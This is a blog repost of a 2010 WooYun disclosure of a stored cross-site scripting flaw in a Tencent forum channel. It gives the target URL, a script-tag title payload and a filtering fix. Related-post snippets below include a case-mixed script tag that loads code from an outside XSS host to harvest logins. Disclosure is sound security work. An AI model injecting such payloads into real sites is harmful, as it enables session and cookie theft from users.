腾讯某频道持久型XSS

最新推荐文章于 2024-08-08 22:10:43 发布
最新推荐文章于 2024-08-08 22:10:43 发布
阅读量4.5k 收藏
点赞数
文章标签: web安全 网络安全 安全 hack wooyun
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jd_cx/article/details/124189680
版权

漏洞详情

披露状态:

2010-07-31: 细节已通知厂商并且等待厂商处理中
2010-07-31: 厂商已经确认,细节仅向厂商公开
2010-08-10: 细节向核心白帽子及相关领域专家公开
2010-08-20: 细节向普通白帽子公开
2010-08-30: 细节向实习白帽子公开
2010-08-30: 细节向公众公开

简要描述:

持久XSS,可得到cookies

详细说明:

存在在腾讯搜吧里,发贴时未过滤严谨

漏洞证明:

如在此吧:
http://review.book.qq.com/%E5%BF%83%E5%A2%83%E6%9C%88
提交标题为 "><script>alert(1)</script><"

修复方案:

严谨过滤输入输出

版权声明:转载请注明来源 blue@乌云

Sword-heart
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
腾讯系列的XSS注入篇
09-05
腾讯系列的XSS注入篇,感觉还行吧。如果用着有什么问题私我
心伤的瘦子腾讯xss系列(21篇)
11-11
最全面的xss教程,全腾讯site实战,心伤的瘦子大佬出品,21篇
搜狐通行证某处反射xss
swordheart的博客
04-12 128
漏洞详情 披露状态: 2010-07-16: 细节已通知厂商并且等待厂商处理中 1970-01-01: 厂商已经确认,细节仅向厂商公开 1970-01-11: 细节向核心白帽子及相关领域专家公开 1970-01-21: 细节向普通白帽子公开 1970-01-31: 细节向实习白帽子公开 2010-08-18: 细节向公众公开 简要描述: 搜狐通行证某处反射xss 详细说明: 登录后状态下 http://passport.sohu.com/web/updateInfo.action?modifyT
腾讯微博客户端源码
02-01
腾讯微博客户端源码】是腾讯微博开发团队内部使用的代码集合,它揭示了这款社交应用背后的编程逻辑和技术实现。这份源码对学习和研究腾讯微博的设计思路、功能实现以及优化策略具有极大的价值。 源码分析通常包括...
腾讯服务器的渗透
08-16
6. **持久性机制**:攻击者可能会在成功渗透后建立持久性,比如安装后门,确保即使初始漏洞被修补,他们也能重新获得访问权。 7. **数据泄露与防护**:渗透测试期间,会模拟数据泄露情况,测试腾讯服务器的数据加密...
js 腾讯QQ和淘宝旺旺在线客服代码
05-25
首先,我们要理解JavaScript(JS)是ECMAScript的一个实现,它是一种轻量级的解释编程语言,主要应用于Web浏览器,用于控制网页的行为。在网页上添加在线客服功能,JS可以实现实时的用户交互,无需页面刷新就能与...
网络聊天室-完整 模仿腾讯QQ聊天.
04-05
10. **安全性**:保护用户隐私和数据安全是首要任务,需要防止SQL注入、XSS攻击等常见安全问题,同时对敏感信息进行加密处理。 通过以上知识点的学习和实践,你将能够逐步构建出一个功能完备、体验良好的网络聊天室...
基于ssm创新产品提前购平台.zip
03-23
"微信小程序"是腾讯推出的轻量级应用开发平台,用于开发运行在微信内的移动应用,提供了便捷的购物入口。 【压缩包子文件的文件名称列表】只有一个“基于ssm创新产品提前购平台”,这可能是整个项目的源代码包...
腾讯一面
weixin_44030736的博客
04-12 165
怎么实现属性只读 Object.defineProperty var obj = { _a: 'aaa', } Object.defineProperty(obj, "a", { get(){ return this._a }, set(){ console.log("属性只读不可修改") } }) obj.a = 'ddd' //属性只读不可修改 console...
记一次存储XSS(实战)
qq_42383069的博客
04-01 1563
说来也巧,在一个php群里问报错,忽而看到某人发了一句 <sCrIpt srC=//xs.sb/5lpk></sCRipT> 这个一看就是xss代码,群里回复了几下就来加我好友。反正也没事干,那就测试一下站点 先打开站点: 然后点击+号发布任务: 在这里我们插入xss常用的js代码(前面测试会有拦截,这里用到了大小写绕过),然后提交等待登陆! 过一会而鱼儿上钩: 这里我...
存储xss复现(无过滤附源码)
qq_40390383的博客
04-12 463
<html> <head> <script> function setCookie() { document.cookie = 'dsfasdfsad'; //用于测试随便设的 } setCookie() </script> </head> <body> <form action="cunchuxss....
[web安全]一个简单的xss注入检测工具
热门推荐
hzeyuan.cn
01-03 1万+
最近在学xss,碰巧在github上发现了这个xss注入检测工具. 自己看代码,是学习xss注入的一个好方法。 github地址:https://github.com/shawarkhanethicalhacker/BruteXSS-1 关于xss的原理可以参考下面这篇文章,我感觉写的挺好。 当然下次我也可以自己写一个总结下咯!!! https://www.cnblogs.com/phps...
QQ邮箱反射xss漏洞
Coisini的博客
06-13 2997
……,对,我印象中写过了,刚才因为需要要用,搜索了一下,是空的,嘶嘶嘶~可怕~ 起因 甲方“一个人的安全部”的时候,一个研发的同事在设计一项报表功能时,因为受到邮箱的安全限制无法很好的实现,于是将情况反馈给我。说实话,我对浏览器的安全也不太了解,案头的书翻了几页就没再动过,于是对比了腾讯邮箱的做法,发现了这个xss。 背景 公司使用coremail搭建企业邮箱,开发做了一个通过邮件发送h...
软设之网络安全控制
最新发布
2301_81968528的博客
08-08 328
漏洞检测和安全风险评估技术,可预知主体受攻击的可能性和具体指证将要发生的行为和产生的后果。网络漏洞扫描技术主要包括网络模拟攻击,漏洞检测,报告服务进程,提取对象信息以及测评风险,提供安全建议和改进等功能,帮助用户控制可能发生的安全事件,最大可能消除安全隐患。IDS设备对于网络中的入侵行为往往是采用将入侵行为计入日志,并向网络管理员发出报警的方式来处理的,对于入侵行为并未主动的采取对应措施,响应方式单一。防火墙的作用是防止不希望的,未经授权的通信进出被保护的内部网络,通过边界控制强化内部网络的安全策略。
Raspberry Pi入门:持久XSS攻击与大网站架构深度解析
持久XSS攻击 - Raspberry Pi入门指南》是一份针对Raspberry Pi初学者的教程,重点讲解了一种在网络安全领域常见的攻击手段——持久跨站脚本(Persistent XSS,简称XSS)。XSS攻击是利用用户在网站上输入的恶意...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值